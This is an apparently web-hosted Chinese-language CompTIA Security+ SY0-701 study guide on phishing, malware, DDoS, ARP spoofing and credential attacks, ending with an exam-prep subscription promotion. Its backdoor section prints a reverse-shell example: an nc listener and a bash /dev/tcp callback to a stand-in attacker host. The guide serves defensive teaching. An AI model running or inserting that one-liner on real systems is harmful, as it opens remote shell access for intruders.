CompTIA SY0-701: 威胁、攻击与漏洞 — 学习指南

属于 CompTIA Security+ SY0-701 — 学习指南. 使用经过验证的答案练习: CompTIA 考试中心, 或参加限时模拟考试: ExamRoll.io.

现代威胁态势的特点是,攻击者将技术利用与人为操纵相结合,将多个低严重性弱点串联成高影响力的入侵,并将其活动伪装在合法的业务流程中。理解威胁始于理解其意图、能力和攻击向量——并且要拒绝将表面症状视为完整的解释。

社会工程学与钓鱼攻击变种

社会工程学利用的是信任、紧迫感、权威或好奇心,而非软件缺陷。传统的钓鱼攻击通过电子邮件广撒网,向成千上万的收件人发送伪造的货运通知或密码重置请求等通用诱饵。鱼叉式钓鱼则缩小了范围,利用从 LinkedIn、公司网站或泄露数据中收集的信息,为特定个人或部门量身定制邮件。鲸钓攻击则针对高管——收到伪装成来自外部法律顾问邮件的 CFO 是典型目标——因为他们的权威能促成影响更大的欺诈。

渠道变种将同样的操纵手法扩展到其他媒介。语音钓鱼 (Vishing) 使用电话,通常会伪造来电显示并以冒充 IT 帮助台等借口来骗取 MFA 验证码。短信钓鱼 (Smishing) 使用短信,频繁利用短链接和针对移动设备的诱饵(“您的包裹无法投递——请点击此处重新安排”)。由于移动浏览器会截断 URL 并隐藏证书细节,短信钓鱼的成功率出奇地高。

商务电子邮件诈骗 (BEC) 值得特别关注,因为它通常完全不涉及恶意软件。攻击者在入侵了一个合法的邮箱或仿冒了一个相似的域名(例如用 accounts@vend0r-corp.com 代替 accounts@vendor-corp.com)后,将自己插入到真实的账单邮件线索中,并重定向电汇。由于邮件内容在上下文上是准确的,并且没有附件,网关反恶意软件和 URL 沙箱几乎无法提供保护。FBI 的 IC3 报告称,BEC 在一年内造成的损失超过 29 亿美元,使其成为迄今为止涉案金额最高的网络犯罪类别。

一个常见的陷阱是过度解读看似良性的症状。当用户向钓鱼网站提交凭证并收到“页面未找到”的错误时,事件并未解决——这实际上是一次完整的凭证窃取,攻击者在捕获凭证后已经重定向了受害者。没有明显的错误页面是攻击的一个特性,而不是攻击失败的证据。

恶意软件类型

恶意软件并非铁板一块。勒索软件会加密数据并索要赎金,而像 Ryuk、Conti 和 LockBit 这样的现代变种还会首先窃取数据,作为双重勒索的筹码。一个明显的指标是文件扩展名被大量更改——文件被重命名为 .ryk.locked 或随机字符串——并伴随着在每个目录中名为 README.txtHOW_TO_DECRYPT.html 的勒索信。

Rootkit 在更深的层次上运行,通过挂钩(hook)内核结构、系统调用表或固件(bootkit、UEFI 植入物)来向操作系统本身隐藏进程、文件和网络连接。由于标准工具查询的是被 Rootkit 控制的内核,因此 tasklistps 的输出不可信;检测通常需要离线取证镜像,或通过 chkrootkit 等工具与已知的良好基线进行比较,或使用 Volatility 进行内存分析。

后门提供持久的未经授权的访问,通常在初次入侵后安装。它们可能以计划任务的形式向命令与控制服务器发送信标,也可能是硬编码在应用程序中的凭证,或是在一个不起眼端口上的监听服务。使用 Netcat 或 Meterpreter 等工具的反向 shell 是典型方式:

# Attacker listener
nc -lvnp 4444

# Victim callback (dropped by malware)
bash -i >& /dev/tcp/attacker.example/4444 0>&1

这里的陷阱是应急响应中的“隧道视野”。一个被标记为“检测到恶意软件”并被迅速隔离的警报并不意味着事件已经结束——初始的投放程序(dropper)可能已经建立了一个后门或安装了端点代理无法看到的 Rootkit。

网络攻击

分布式拒绝服务 (DDoS) 攻击的目标是可用性。容量耗尽型攻击——如 UDP 洪水、ICMP 洪水——会消耗原始带宽。反射/放大攻击滥用第三方服务,使其以比请求更大的负载进行响应;一个带有欺骗性源地址的 60 字节 DNS 查询可以返回 3000 字节的响应,而 NTP monlist 或 memcached 放大攻击可以实现超过 50,000 倍的放大率。当公共 Web 服务在服务器上保持“正常运行”但从互联网无法访问,并且网络日志显示流量激增时,原因几乎总是 DDoS 攻击耗尽了上游链路或状态表——而不是应用程序的 bug。

在途攻击(以前称为“中间人攻击”)将攻击者置于两个通信方之间。在局域网中,ARP 欺骗是常用机制:攻击者发送未经请求的 ARP 回复,声称自己拥有网关的 IP,从而使受害者的流量被静默地路由到攻击者的主机。ettercaparpspoof 等工具可以自动执行此操作,之后攻击者可以使用 sslstrip 剥离 TLS 或注入内容。

域名仿冒 (Typosquatting) 指注册与合法域名相似的域名(如 goggle.compaypa1.com),以捕获输错的 URL,或作为钓鱼和 BEC 攻击的令人信服的基础设施。

凭证攻击

凭证攻击并非利用代码漏洞,而是利用薄弱的身份验证机制。暴力破解 (Brute force) 会针对单个账户尝试所有可能的密码,这种方式动静很大,容易触发账户锁定策略。密码喷洒 (Password spraying) 则采用了相反的模式:它会使用一两个非常常见的密码(如 Winter2024!Password123)去尝试数千个账户,从而确保对任何单个账户的尝试次数都低于锁定阈值。对于那些未在云身份提供商上强制启用 MFA 的组织而言,这种攻击方法极其有效。

凭证填充 (Credential stuffing) 会重放从以往数据泄露事件中获取的用户名/密码对,利用用户在不同服务间重复使用密码的习惯。由于这些凭证在至少一个服务上是有效的,因此它们可以绕过基本的身份验证控制。2022 年的 Okta 数据泄露事件就是始于针对其支持承包商账户的凭证填充攻击——这表明,如果在每个特权访问路径上都没有强制执行 MFA,即使是身份提供商本身也无法幸免。

哈希传递 (Pass-the-hash) 和 票据传递 (Pass-the-ticket) 攻击则是从内存中窃取身份验证材料,而不是破解密码。在 Windows 系统上,存储在 LSASS 内存中的 NTLM 哈希值可以被 Mimikatz 等工具提取,并用于重放攻击,从而在不知道明文密码的情况下向其他系统进行身份验证。同样,Kerberos 的票据授予票据 (TGT) 也可能被窃取和重用。缓解措施包括启用 Credential Guard(它将 LSASS 隔离在一个基于虚拟化的安全区域中)、将用户加入 Protected Users 安全组,以及在可用 Kerberos 的地方禁用 NTLM。

实践场景:通过密码喷洒攻击部署勒索软件

一家拥有 2400 名员工的物流公司未在其 Microsoft 365 租户上强制启用 MFA。一名攻击者在三天内发动了密码喷洒攻击,使用密码 Summer2023! 尝试了所有从 LinkedIn 上收集到的已知电子邮件地址。其中有 41 个账户匹配成功。攻击者利用其中一个被攻破的账户(一名区域经理的账户)访问了公司的 VPN,该 VPN 接受 M365 凭证进行身份验证。通过 VPN 进入内网后,攻击者花了两个星期进行内部侦察,识别出了备份服务器和域控制器。在一个周五的晚上,攻击者在 340 台服务器上引爆了 LockBit 勒索软件。整个恢复过程耗时 19 天,包括赎金、取证费用和收入损失在内的总成本约为 410 万美元。整个攻击链的成功,仅仅是因为缺少了一个控制措施:在 M365 租户上启用 MFA。密码喷洒攻击是可以被检测到的——只需一条 SIEM 规则,将来自单一 IP 地址的、针对多个账户的大量失败身份验证事件关联起来,就可以在攻击的第一天发出警报。



身份与访问管理 · 所有领域 · 网络安全与架构

练习这些题目 → · 在 ExamRoll.io 上限时练习 →

Pass the whole exam — not just this question

You found this answer. Get every verified question and explanation in one place, and save hours of prep. Free to start.

通过考试 →

Related guides

一体化访问

一次订阅。所有考试。

所有计划均可无限制搜索答案、进行模拟测试、获取AI解释以及访问完整的资源库 — 支持20多种语言。

每月
24.87
Just €0.83/day
包含所有内容:
  • 无限答案搜索
  • 无限模拟测试
  • AI驱动的解释
  • 完整资源库
  • 20多种语言
  • 每周内容更新
  • 奖励与推荐
  • 优先支持
开始免费试用

无需信用卡*

最具价值
12个月
179.87
Just €0.49/daySave 40%
包含所有内容:
  • 无限答案搜索
  • 无限模拟测试
  • AI驱动的解释
  • 完整资源库
  • 20多种语言
  • 每周内容更新
  • 奖励与推荐
  • 优先支持
开始免费试用

无需信用卡*

✓ 包含免费计划 · ✓ 随时取消 · ✓ 所有计划均解锁完整产品